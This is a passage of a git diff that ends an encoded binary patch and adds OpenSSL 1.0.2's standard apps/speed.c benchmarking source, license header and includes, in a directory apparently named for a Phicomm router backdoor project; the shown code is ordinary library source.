zN?QL>*&7%t>wj`8<=j%yJ(eV`{v)maqy8hbAER9_@WNdBrgH71pCT1}fPPrZCBKh;
zc_V!r{{|^gqXPXEcX5C=7T&Ic65f&vw^UruVNTU&0zMO1YXX%fP+|g9VwH;PCdpTu
zKsyKaj;Y|Et-DowmJQ6Iq`|>2O0%~Op0jx1wX**6i3PUIuBa*-@Nx9^S)8UV^TwO}
z%PsTNxPtg^3*#Myai%c7u`uo_gwx}sNW)W4C}X-zVuG2L3SYME!_xlj#I)LVk2B^W
zXUrWZ#!QfsWUo7Z{J1l6#fL>Uepuw`9~SwaAACrjhYLoI4{SX!DtkJO;}Z+Zapl<$
zXfhR!^JRbGj4R2$?2H?oeYjxU#K5fwc)`jJ7L2CiyzxRdUNBCQj;5sT1*69Ywj9`!
zt#`z2JuoIawNPAH|8K_>sC-%fp~Co;LO3mDqnPY2cXSCw-&-*H+_u3DC5s1+l=Zi9
zCvAPPgx45ZF*9l&XRj%kurxS0zl0}5P4-q=u}<v5oS-ke_QM6&XXg|YOj23&S8Sn$
zB6~(b%?-h=H<oy1{daH!Z@sCa+)K3v2acrmfhF?~d~BgZ&2MGeEFL)8R@TCRq$OTj
zO(w2INpO%zTjnUO%WAF<_RBIB+}=)cbE&GIRr@3^&jt$?CRgRD*&Z4#C$`Co;NXoV
z!GYst{r}F5O06B#t*r8-V;3*=bX+ML_!T>tLa3vOHVh7y`-db!c1OX!xluRDW{RaM
zr<SOep<LP1**fk<QKh4ip$-J5RMa$WgMGQC$<`LE^m(~TXSvnvN>iP8a{s<VgYLu@
z%Qb0b_Vj{++#tD~O^$Nw*+-akPIDJ)4i?npGHTC0QBW{ajcJZ*JizYN1xq<2*9Ow9
zC$s^b7i9lfFx!*NJX<|{=7}{s$HcDXG1GrLcL11Yxk&m1#eX!o{j+kQ4sPGAj?mlt
zD_$jm^ezv%x?{A!o6a3<3Lf99I-U=E<ey%t&zyL97!K0We-a1gP+%Gd8Yr-w1635*
z$bkw9RB+%73h;4%_!JsMF-gx0jhy@hx2l;|l6~sk<HrZbRBSywmj=Z{Bu`WQWNymI
zlo|fx-{cwFRM!8rSn~+?sS%!@8qAw1Qv7U!yF}K8U?x`4lv?<gOo5RlLoX1zNyvz7
z$_5Tl8S*pr51BOtnv2i9Wb$P9QG%_rE2gC{<+@F68~;05f64~Fz)ouHj#x<j(T8iE
z-KIPyrJF{&i%v+nsi>RQY8O>fZa~{$cmbEEgj~2NUV07)hHEKGjsR4RT(N2JnH0m5
zazUe{Q$9YU9{6cl|Jyt{2Dx?edO|N){|869Sa%N&?f*h6(RGa)BmceRxdHZn$@LZ5
z|Bm+b4}Iq%nxW6~*Z<@I;steh7N2C*=(*kMAMzgzZr@h1kFt_cMoZGt{E4pyAFUp8
zg=wyad0DBXM09z4yw(5Ob9|U!HkTO(YB-QxGM-kgo9IF~bunc$D3_Cb27B)web0b)
zQoc5Q%9o#UFtbO`F}i4di0#s2_`Lt<n2Pe$N658%RB$_;O40@D_A2=)Yk6~ca^UFR
zEjDj`Qw~)=I#hj=l&O!B;{y~J)wX>)r!@Mqmc!W$?X!m+)q0qg-%05nK05jEbkwI>
zh*tEuBP)DOkdAbh=?b-Nm)j29+WViSHCHutkWP5{MBor#qtXFuZZPw*vN8wR;ctyJ
zDdk$}rB-t9RgM_tXOJsMB_CR5>PXdP)K4nf^klA+hF5cyrh2KX<WTns&SL8SHw&uZ
zP`WNJi+q1IF#JcdO;kT|F3)Z#k&|3Gub(=6ZmtLvy*#~&4&Uih)WN@v?l;w>7PiR+
zf$HQ{rmmTz?QL}8bBNlp)xY1re^8w%N$#P*YHHR+nU}eACD{k*I*E^rRKIpFRnM*5
z-j;b?6_h$`D$8gxtf*+$?l|AFkMPjYOOL+N;6yZdcofl<%&+NN52dl`Q`w&GN9?K?
zA}o0f*Xr0Jsu;&oc@OG~mf^`}5T^Yq&Sb&EB7ISQf%q)rh<IinBX>JeVn~s_jW6w~
zx@*1Evf$wEk)m)GYq55G^NkC-DDx8MSHZ2Y*3_1BLvgl`CK@4fUhSo*Z1mff`Hf_|
zNXBuxfeltW3dU<h_CoS78K}BaQtJAOG!5&|%Du7R;I4|>N9w2jxqxN;N7VIGc$jKv
zZtszt&x&cXmGzGuJ#wom`yMSwWIZWeOGS=(sd0QmfllhUkUkmVEt&VY8gnI&mJCg5
z8ade|G(D+b9wJlf-*1vjOXk>??{DD|N`3E3-$HA{+|+n-?H-#hA0C%)PvYQU8;t_W
zrqX|O%lGH{j|VbCoKo^JbN+m)OJK_zqf-}B!*DSwRWX_m-*T4hwq#xp9Dhlt`K?(Q
zhJQq}x1Gzzq9%#Hm`K?jd}>RRg@&==W{)oU=yX;&@pO`zt-C=lOtL1?I1teyxmQ}&
zKS(Xnt`|oCewt}!iqHfy^AD%qRcq9=E9<|4Qnt{kEH&t!w#)}~K_494CKt;(1J$2Z
zBx}p4RjDoWt~n7uPW8#2MfbM2$y=y8zI0`v?AbRamVN38>JHs^e=@fT_*&@m#IuK}
z`}tzwf?+zbK9WwgWqxG_+t8xSTeKYM0d3~dqm+R1n3kT+y;akiIo6iR(p?2|R%@4(
zmi^^YE$<XrqOwzzLq*vD-)fhhq}7?zXWm<!d6R2BME%m1`Gx3pad<30%w1@%A9N%o
zZOP>7rPje<W=us{|J|&nmMF(5sro53heiaAYZlC|5T|AWH=oU2okP^jW(ZO9mJk2X
zwEHkk<rOSccfg09qbX_%rs}wj+uW4Y97M8bNl(nK$bkp}YRp;bvxAx6nB#f&GwjAU
ztP->=Nndic`aHf9zoMc~`;y$8OjGRjI`;YkvAZj_kfWFS2(K3$JVB%8Wi=ILBTaBB
z4GD)>I8rLrx!I?fQYoem|B@3GrB9PRUKU2Q!v{HTRN=U9=bBAf>cU97Jx3GV8(zjo
zI5=-29g|9mgOjAgf1(vFUzpubjMUH32=j(dQvT1;gwbbHbO%JvrSw64;HRl8hZk8M
zv|O9Kbb9Ke0w-y#DxnyOYLb8&4pI@F5f4ALRC1_NQ?1yo7vbZnVnwLYn!MD6k;RC+
zy+jjryU#pSFsCKtS|f?g(4-|nndMFn>G+w;aEQvO<?41JAMEyVB?gYC&X$<rDO|G}
zt`MDBlnv~nI~Liu>5I?O`0SxGST|;RB?U~eZ<Q4=bLi@81J?wu4SYNhdU2DtX`Pqw
z66?IGNN-1Cb6?7<>Wt_>GP=Ikt4c)F@5V?X+O^rM>f6v5Pm3&B$Ks?{m5f9>N!U?a
zRbQii{k2Uh&`|GHg(FGX=ila9*{_||;8k^mdm^z|G%S(19afkfk)<NnQ+B=aXm2W#
zpaS*AO;LK|9o^xmppHl)MJ4Hthf}Ep|8_=F;f`(&C3~Vhk&bYmSG6wM8%|Iah(*_P
zxl@TqxW}uC_I5_P80P}<SSP2Vk|bhXk$8+M6Yixt_Jxy4&M+1Cs=5+!N}Eit`$VLJ
z3dpS#p{x^;jwt2T)9J13-OwA~)a&bvu8$;BzUj#coYjWNW^Yj}7Fi#T`P8m&Q#930
zZR*n=BqLE*JVEwcudZl}N-{rSe*3~Hsu&j|+N)HQI2WKaacZgFl(#q?OGW!)5uYkr
z(iczo$T;ciji-F!SS-FN(mBCf64&uQ&MVp#?FgqRNgq|CE2;%jrzm;mX_TEyTA7@Q
zYTgCYmC5jW%7q)*cXhlk6^-{MuN8fDU!=!ZU0prF+teLNM0`5Z7fwW|Ve}~Vsm<*5
zM3U@B@p|y;c(bQ<kxt);k{d<K=tuTOBGm{p(Rxps5iQhIFe>VVKI+8w%jYjYr_o1a
zE8USwOQC6!)ESk}X9~@|?n@=4hgw>fOW~6vvV5Hq@I)I?<QXk*ZEYb7H3^L-PqA!1
z&re?^jrA~%jG0>9Q14VX)N2jRP%S#ak)lYXruYRu2{hNL0L|VBo-w!5x3@0#=?0T_
z=vdd`BNMVRbDxaKCbuW1X74X`HtERTtRt#Co$=loDPJ-YPIPqRXifT}y=JWVXlm&x
zBI#)u<hn_v*W*JEAJK+&*PF!(v%}$(NMg3)FH4zjF6AHX?TDp2N9Hk3RGK8cl4G=Y
zy(Cu)pGu!j^85*3msV+wgx5%&fiFLYaPMYS)lMIaqU+Kr=@hkc=BG)~l9-I~Vqq$t
ziu-u6rec_7%g1Y$FP@^AjP*<kC!I{Ggi@(Vm@hOsS%7>-S9m#+thlfAtfwV~a-e>c
z2vzoIFHcbh62*%qEiCIfQb!R9r+mv7FIwC>GF2|{$#_lpT3VM$LRv<1wkly?BD#^=
zf@3P9U9!gN+EI~mCFWVD7k8cUiOIQCREA2OXX}!Mi<Y!<LOw=}R7Ou9T^ZVg+L*Zi
zN^SJvLOUnZeSNXbe5l~VY$8g-E+>$-<-;niLR>d9$f@7Mot<V#={;JKsmOegq)0t-
z^j;^OQ*fj{cKXzG(tE^t5a|@sF>3Tn?y(59vBXOcbw|RTkpz3q5Ab1;j<r$@T6~i!
zDkaR6B*)Q_I-b}pa%o82ng!*$Vd)GYL^bZ%ASF_vL}X)}4wE#(Xq~54phIhynm36V
zc@x@~rqhM>zWK}AWN9;2Av*f{{!%MB*U2|jrz6$~<{8HkzP|26m==I!Je}y^@y@3(
z(#z93xNg%s<S0AR&=QKpskdmps^L&cjc#^iP2`<iJI<s@lZv0P#<Pa=qMq+f_pGBC
zy*@&xMqz6D2_E-|9O6~Jxru>Y#pen<k@dkwCUR>cL1cX-mEs2F`fZ9Q==5cJjK*T5
zCn~k09M^5870bu9;B%LP_EI$|h&kKg=J0q#v$vVs-uy5h9O8Ynz>cgNavC>}+9+?m
z;L_>?zZy2GxO95i$(GA6l+l_yzfjH`J2JVr+xQd_ay7HqMCtVe2DPX1=^!g<mlIDu
zl)x;BRF)GZtN6^GPy1v%r#m`mc6Oy>6SVoJL{z+0?nxibZ!TwEs;+P}Cg(aU;ulHm
z0-E<Kv|ODas~v7QQ!BMLozQaL!uj(r@>Q-}m+noaea+Q%)iqWA#<cAEZ>g=RuBo4?
zu;=krDBm66%ld^&R(f<fImC>wBzZek{dl8pSmuqozI@af6UUX@MVE<Z66X(ZbNFjP
zY5BI%mzDaWrRA-qB_2Nvp3R)L@10Ix6o2RF%S)%;Q8cgAw|&gK(#mbcfzq1W#s*58
zwvJm^`oQR-##2fkBFW>UucF_1OcobWXfcrx{RWuq9aGvgzqBS$T1htZN~g{%EuTl(
zIXAwd9pk-yypW)%;2V!zcT@ZPR7KKS`HUW4P@8csYLm9m;UZ~O6EpH#<k1c90$Y(+
zxFSU!=aRpjBD=-jgnaBx(fqG0uKKDt*JmdBV_HAW0R4Ne=I2@be9dbuE?3c1Uw$No
zTZ8Nrdvg&|SdEQhuhru7WWU(E+~Psa`IQ9RmdH-AcMU=cuh6{H;#X<T;}f^FvQzA(
z5K_2H^P4QL(ieODFbKDV>=b*SLrCH4HUFB$Z_)f47Vp=bZ$jbr*RoUWeHS5x@6!Bb
zi>q=JdwlyBw=c?0vG*?sDf~B@|A)mN()@_U`B?+69`9J3-ymTApB8^s^Wu>yBV<VP
zi56G&DfUjY`1iHmXYqrY&$Kw-&f)T0Xz_p7ywT#XX@0TAf311I;=j}UGK(M8e3`}H
z*L;n|N6UV(cdf-sH1D%`spdN@eyZjVSe)Ox;&yo0;;J2sy(cYxuGT+m@e4GU_pzle
z>Z?}smo0sh<_9c(spdbjc#G!$W^vWN#oi{1w`+aTXebN?S7}~h@oO|+YVmcNZ?<^1
z=3laSujY?iJf-=o7QaFBKUsW>=2NUg&uyAtVsXCf&ixp%_}!XsxA=XUKW6bSYyPUm
zcWVBD#nree_NMVk0&I_K{X&a>Tk~}m->v!G7T=@!Zj0~J{B4W>KyyEzz`&-)Q?a+!
z;y=;)&shAh=C4}(b<O`^@wYUeF%~kV;O{lR(&EQ7|D?q~(ERHbA0y+V*!vHQPtg2*
zi<fIY%R04~ta-}fXKMba#iwb$-{O^;7g?t$)ta|jyk7IQ7QaaIn=L+9^Ls76K=b_;
zZ`1sk#g}V7%{pbeO7k9zhc$oR;@z6RW%0P?Mb?SeM$H#k{ASJRx-D<(*Zg6N4{E;0
z;&*E<Kj5@Ob3hXOqUP4H^}edP)xF+>njg0E<!7M0&ivWpyELD8Qhv_zJc{&ZS$vPy
zud(=k%^NMQ)=gUHE&eZBe~-oaWoRzvV;29F=6`STw>1BS#s8pr@x=Uksr9<pJKN%;
zWPL35F1C1y=2uv}O!GAspR9R@#m~~b&*EIVBKeb|{Bl;1p0DTZ?IH(X?%?Z)pW=;D
z*LGwk*KqXP<ItxZ{3Zwgw1eO2;Gc8wuQ>Q44*sNrzv$ox9Q<bvKJ4J{I`~*Ro)zk^
z$qs(5gEu(%<qp2q!P5?YtAl48{L2ph4F`Y1!N2R^2Oa#U4*t4>zvtj5)52M(U#2+t
zGzYJ9@YxQ&$ibI7_*D+R!NG5F@NEu$uY-Tl!N1|)dmQ|bgTL<JZ#(!g2OmY}Nd^1S
z!K)m+(ZO3C{0avTIe5&$`FycZ`R{h{`yKo-2Oo0qpE~&O9DEF&P!uX>xr5Je@J0up
z=io~n{AvgH<bip0hx!e5tn;ed=GXJrEdFZXuSWiA;;&}@^4G|>U%qSQyH36(nP1ZR
zC81wZ`X#Af($-4aT1i_gX=^2It)#7$w6&79R?^Z-ACzOQq^*;*b&|GD($-1ZI!Rk6
zY3n3yousXkv~`k}-XbBNdP!R^Y3n6zy`-&|wDpp<UQ*Rds#%h1mZX{`sb)#4S(0j&
zq@veO$a$9JSTEnR#9@{=G>AikI5dbugE-JjER?E292&%-LDDuz+6GD6C}|rdZKI@Z
zl(dbKwo%eHO4>$A+bC%pC2f<WZIZN2lD0|GHc8qhN!ui8n<Q<Mq-~P4&62iR($cFl
zRL*8e+bn6DC2g~$ZI-mnlD1jW`fDVyzeZB~Yb3e9M$-Fh#K2!84*nXk@YjfkzeY^_
zHOhrE6(dQnQk!9?oc+q#uj7=ZUuB>NpB{aB_^I*dR|C+mMxb8}LBAS<el-aFY83j_
zF!a+n3@vP1Ixo-`TDoAt^41lh6@htets!sqteWP~@)b*$wT9-eSRJD0NTCQnQS$oY
zv1ms$k_^!UTzY3lCRnJ4-zt(PoH1`*G|p0Q-lC<UWJsPAaj-YC$xEi_;iHP_NF`z(
zKXnSx)6%Z!dWuVQ^z?bHtJ*{K`bQ|z8L6ZB+K~e$%&&ChBIxanP<>6_uF-K+Lwzoa
z-jxW^8xr~Z&9!;^^p-?!-@E~lmuLh+${aMwlN-3Qq26>X=25sWo$Quca2u*uo7Qda
zrB}J6g`^d`xc0SOJt>c#ttUh3eTQ5cdOeC>2f#FGdUY$@*B6qfdYuwn7Ff~}lJ=Aq
z=h%Fd)U8dA6GuWxuXWin)sw1wwTd3;N$I#A>RDfkp39A(K2IL_hxmzHh#!zOdi3yJ
z?Q;Js)L9!<p%5`i+?9yXbHh|8J<{@$kyN_R)D?ysaZRZ+a2!&EpQ@aoH_*gCq#t+c
zJsy7C-t-8Se>R3=>4=V^hwUMJ2&j^Cf)Gck2X!hdDIpKS_RCw>gk(>tyXalGnD*08
z2lbxrE+wN*uF-}`X%l`L7~uv8aUHp2%9NUGBudiiHdRy+Zd6MZ(l6mfYjw+uw}!cH
zSBX^D(GZOHsa&O*SG6u%v|vrBJ+LgW7_ge`SYz%ip1REV3A{Id*_!qhYTpY{LBbsy
z=utn_h@NK3CFo>*Axfv&-ZuKYPw#E><_EqV_@lt@1g@SZ@Uu4ctmDth=J;;V^UK7>
z|0Upe1Aj$x<74zc0e%nYvzl}HKMVYKn%h3_g8p96kC*!js{DK_#pF9lbN1(FHHP~@
z&$lQHSNGx6b6eCmf}U>`82ucF{}Ryi-yRwLDu+G-`clyIpT_fMm;WZvmr=a&SNFY6
z)ZYVoK94l|FF5>n0^b38b-zlrGyg%e@p&5b*ly1QzYp{WH0PgFfUEmYCzk&(_<SDp
zS@7X!vZg$5gC5Ico(ph$-VgdBx_`hMCp(os#^)r>?e;$vIR7oO(X0DO%I7rT(?O5r
zsRqu^42@5t=3Ji1!1<p)@Mf2X|Hp#iU!s8VSph!$?Aq{aK#%1y&pX)v%b>pwe5L~5
z?C|*%@UMXW4)FO1aK8V<n_Vxy|77?B6fouI`%k=a`<zZ6!=C~@)@wKLuY!Ib_?!XU
zJg>3K^RM9ZH=zF&_?!v+2<Wjqqu7`>F8^8dG36hxxt;G>pg$Y*(;fO|(0>&40f&Ai
z=zXBS)}g-+^dAE~{}&D3_y_BI7wD%^oT=}94*fSle-7yR|F-bPKj{Ao=qo7B`2WzM
ze*^T>LH}EazKHIB@W%ahE`5yuNt$yqEYInnp8<NlkHwp<H_zADzmh)2zuBP=g8xj=
z^Z(r8&Gugp`tvB>_{Sak+dzLl==opA@MinJ0Qw6k-uUlz=nsRw3iNL}^n9O*H*TM5
z`WXN5n%m`>2Koy@f1X3X0Q5DWU*gcmfqxD3=J_L+XD9G`9r}lXqyC4QbA9<-&eWIh
z8}Vk>_m7~jrFf$^&oOQN*>wMgH|Bp!AEUoibI$iJ;H|*xfb;z!-q`0s`WPR+Kg1jR
z)YHfC4$$L#*$y1r^Gm>Yg3rUiQNJ5F>a&`2dH4^vOnKf0J(lOM^m9+H*VjRRuIB91
z0K6LX=(7;?ji6uZ(DNT?^Tz&7^fBd3I`nsfz8Um89QwyWe-Y@Pap->n9NXat_*@J=
z?|>fLVTyjvYq#eN&AGm_!RJEIqfaa7F9H2xhyF&;<9NOw^bdj0)4;z0{1W|qmdlAg
z^cO9%F~5{ProXy@qn_SH&guDGMx&=cNsx`(=V9P?0mpIv0B{`Vj{-;iKH#YTH_h#O
zy#{<Pl;=0#gY$ice$LB20nqz3=X#;O2lVqmpK$1Z4|;6R_khm_ACE86XtVPjr@39<
zQs6C=&h*P^4xckYkL5WBcq{mv=kW1^9(|gCF94r84xa^}N1w&O7lO|UhtJiZN1t`T
zgWwZ&_?YMEb~|qZpGDwvi^FFC^jMy4z%K)zdmKLZgC2dp3jA{LdC1}OEzqOSw}H2T
z&vzX@FM%F?UID%sd=5H%{uT7-a~L?k!)wO#8xEh}fF6C`0lpM`-go#E@y!m}?0%mB
zyq)4rc_wLY&(o=($MSp>_!Z!DuEVDa^ypI$d>Qy$?C_Zfdi1#*_;T=RclcZhdi41?
z@D<<_arneQk3LD@E5YXmhtI8`N1xk)uL7St9X_7}J^FkJ_?6(Z)8X?7=+Wm%;H$ys
zI}V>A(4)^@;A_C=2M(Wq20i-x4ER;x^Gk=%uR)JKZv(#?e2zJMj)NY3#_~-=+IZew
zLmxB0PS)I>U#Ef|ea--WE%;1x_{;=7`qTjbIQTR=d@cn&`m_QMflr&mXF2H6=PKZ9
z!6)qS=>|Re#DRywXQRXCX3(QgKk#+nGwATS8}#V&1>hav^MJ$W>!3%U$AEW&&(jW{
z-JnOG7lB8>=X(yHe*!)F90J}2K0kN(ybgNwIRbn=`25k~^Jmbb&uG5MP8-j!Zu*${
zHC}UjewBkBeWn19g3s9wpXs1Sp9_G00(|NmJ{N%=eFDHYfKSljvlR5`vkG_&e6Dr)
zbb=mzHURGdpM=9_Gw9K08}MH6`HaKoKG37jSAfUC=Rt?hqo7BhUBLUm=Q)SZ9?+xD
ze&E-E&#MlfUxFTe-U0n1;A37gvd`bfm6M1z<_Y?k@jp>>d;G5kJ?0w${WrlU0sK+m
zn;kw|fG0u!*WiQKn-7CN1^Op|r-APQj{5z;Q9lfPBl!Ft_$J_E`QaID+@7dE893_Y
zzXy|++j$3lO#4@BJ#)O?zYKit0{s=huLr&sd>#Y78Td}%kAM&QKM8y@=>HCUz6E?A
z=+WoLpnn|nrTnmvHhX-Y1{~{ky5`(ISg-RzkNGx$9`n5u^f!=~Y5yI-(PtO<JOTQj
z1Ah|uI}V@sf!_%FQT(uzHm(<r^OH5__IZjvrktmOei!ihz@G*l0{(5_n}Giv@Y^)E
z`(-=un?Sz<e6ajq13k9q!@zF_pC=qXKLGv==zjt}IKO@ldhC}!gC5H>?o=|Rjq7_0
zeM~z~)ZFfuO5o@}8+_1zKJZV1|7GBV?RE|5zXSRX(C-4i74(?z?Vx`a^j`!19Pr)1
zcLRS5_;-P?IE{8_<Mw%;KBnE0z+V7<JMbak_W=KU;9m!hJ}&@ApMwtmOU>=^{A=J_
zAm4Yv2iKXCCX<LZ_Q7>yDsXK73pMBV!F6Lb@I4e~+ARkBMc|u&zXbe2;Qs)8zvgy*
z4*|aw^gjn59EW44kcc)e|I73-<vdMu+y6}9p91~Izz6-W0KOOWtHB4`b3O2_pzj4A
z^uGo8KG5F}K55`z0X@#^XMp24d<FOr`1~07e&DYG$93%Yn%nK^O{K)NG4H33Y5!u)
zxnHoplR!TJ`ZFB*3xIzQ^z(qf0z3--w*gOr9?SD-(0>~ApK<6P0sZZuf7+ox1pND;
zAM+8~p^e+;AL(P-%?JDkz-MZ1w|^7x4CpTbAFS_A(Brs$1oQ{MXVmGmLz|uNSk1Zo
zkJHDL|76Y2BZlk46wtp4`g0umN{9X;;Qs_ZZNPDyeB8mifFA^(9^hF1O%DD^2mdti
zm%#r{;6DWZdEn0gf6&1n1O6k>4*~yY;BN!}F>oJ+dE@@&kJ;wxfZ=mYM0Ij=Pby4*
zW<f8cs^4xCN<?DeYWd%k)t%u~*sETbOnTLcIPb9BUrq16cf@;o_+K$r)4yDdRMWqx
zq5nBaZ<*@-^}Xrpz6AY)p+sskC1t}%H@%+9FH`@IY(8=sMW3;j+g!ar{*3$x*5by|
zJm%*jq;PkO0<X?gzbDZTr!7&tW|@?Cd6*YzZhjV7`5JELe*s0X=YKc7pVG2tEq!n^
z`J3liCeGw<e&<pIhii;L|Nd--3Y>3olg|7uqIeTV>9|VV8wuOmH54_DJ~&ocU82+b
zcn3Dq{svt~0rs@hSL*Z+8KM5Q)APNiLjB*=s}h)Y;r<^_ACq1m1`6iQDPPt3oAdUG
p#0CqbXHUED33<o(Wd_<}+&Hk=?Kg?y3Z?JX<-ZZqa?noy{{TZkYTp0=

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/speed.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/speed.c
new file mode 100644
index 0000000..7dcd354
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/speed.c
@@ -0,0 +1,2865 @@
+/* apps/speed.c -*- mode:C; c-file-style: "eay" -*- */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ *
+ * Portions of the attached software ("Contribution") are developed by
+ * SUN MICROSYSTEMS, INC., and are contributed to the OpenSSL project.
+ *
+ * The Contribution is licensed pursuant to the OpenSSL open source
+ * license provided above.
+ *
+ * The ECDH and ECDSA speed test software is originally written by
+ * Sumit Gupta of Sun Microsystems Laboratories.
+ *
+ */
+
+/* most of this code has been pilfered from my libdes speed.c program */
+
+#ifndef OPENSSL_NO_SPEED
+
+# undef SECONDS
+# define SECONDS         3
+# define RSA_SECONDS     10
+# define DSA_SECONDS     10
+# define ECDSA_SECONDS   10
+# define ECDH_SECONDS    10
+
+/* 11-Sep-92 Andrew Daviel   Support for Silicon Graphics IRIX added */
+/* 06-Apr-92 Luke Brennan    Support for VMS and add extra signal calls */
+
+# undef PROG
+# define PROG speed_main
+
+# include <stdio.h>
+# include <stdlib.h>
+
+# include <string.h>
+# include <math.h>
+# include "apps.h"
+# ifdef OPENSSL_NO_STDIO
+#  define APPS_WIN16
+# endif
+# include <openssl/crypto.h>
+# include <openssl/rand.h>
+# include <openssl/err.h>
+# include <openssl/evp.h>
+# include <openssl/objects.h>
+# if !defined(OPENSSL_SYS_MSDOS)
+#  include OPENSSL_UNISTD
+# endif
+
+# ifndef OPENSSL_SYS_NETWARE
+#  include <signal.h>
+# endif
+
+# if defined(_WIN32) || defined(__CYGWIN__)
+#  include <windows.h>
+#  if defined(__CYGWIN__) && !defined(_WIN32)
+  /*
+   * <windows.h> should define _WIN32, which normally is mutually exclusive
+   * with __CYGWIN__, but if it didn't...
+   */
+#   define _WIN32
+  /* this is done because Cygwin alarm() fails sometimes. */
+#  endif
+# endif
+
+# include <openssl/bn.h>
+# ifndef OPENSSL_NO_DES
+#  include <openssl/des.h>
+# endif
+# ifndef OPENSSL_NO_AES
+#  include <openssl/aes.h>
+# endif
+# ifndef OPENSSL_NO_CAMELLIA
+#  include <openssl/camellia.h>
+# endif
+# ifndef OPENSSL_NO_MD2
+#  include <openssl/md2.h>
+# endif
+# ifndef OPENSSL_NO_MDC2
+#  include <openssl/mdc2.h>
+# endif
+# ifndef OPENSSL_NO_MD4
+#  include <openssl/md4.h>
+# endif
+# ifndef OPENSSL_NO_MD5
+#  include <openssl/md5.h>
+# endif
+# ifndef OPENSSL_NO_HMAC
+#  include <openssl/hmac.h>
+# endif
+# include <openssl/evp.h>
+# ifndef OPENSSL_NO_SHA
+#  include <openssl/sha.h>
+# endif
+# ifndef OPENSSL_NO_RIPEMD
+#  include <openssl/ripemd.h>
+# endif
+# ifndef OPENSSL_NO_WHIRLPOOL
+#  include <openssl/whrlpool.h>
+# endif
+# ifndef OPENSSL_NO_RC4
+#  include <openssl/rc4.h>
+# endif
+# ifndef OPENSSL_NO_RC5
+#  include <openssl/rc5.h>
+# endif
+# ifndef OPENSSL_NO_RC2
+#  include <openssl/rc2.h>
+# endif
+# ifndef OPENSSL_NO_IDEA
+#  include <openssl/idea.h>
+# endif
+# ifndef OPENSSL_NO_SEED
+#  include <openssl/seed.h>
+# endif
+# ifndef OPENSSL_NO_BF
+#  include <openssl/blowfish.h>
+# endif
+# ifndef OPENSSL_NO_CAST
+#  include <openssl/cast.h>
+# endif
+# ifndef OPENSSL_NO_RSA
+#  include <openssl/rsa.h>
+#  include "./testrsa.h"
+# endif
+# include <openssl/x509.h>
+# ifndef OPENSSL_NO_DSA
+#  include <openssl/dsa.h>
+#  include "./testdsa.h"
+# endif
+# ifndef OPENSSL_NO_ECDSA
+#  include <openssl/ecdsa.h>
+# endif
+# ifndef OPENSSL_NO_ECDH
+#  include <openssl/ecdh.h>
+# endif
+# include <openssl/modes.h>
+
+# ifdef OPENSSL_FIPS
+#  ifdef OPENSSL_DOING_MAKEDEPEND
+#   undef AES_set_encrypt_key
+#   undef AES_set_decrypt_key
+#   undef DES_set_key_unchecked
+#  endif
+#  define BF_set_key      private_BF_set_key
+#  define CAST_set_key    private_CAST_set_key
+#  define idea_set_encrypt_key    private_idea_set_encrypt_key
+#  define SEED_set_key    private_SEED_set_key
+#  define RC2_set_key     private_RC2_set_key
+#  define RC4_set_key     private_RC4_set_key
+#  define DES_set_key_unchecked   private_DES_set_key_unchecked
+#  define AES_set_encrypt_key     private_AES_set_encrypt_key
+#  define AES_set_decrypt_key     private_AES_set_decrypt_key
+#  define Camellia_set_key        private_Camellia_set_key
+# endif
+
+# ifndef HAVE_FORK
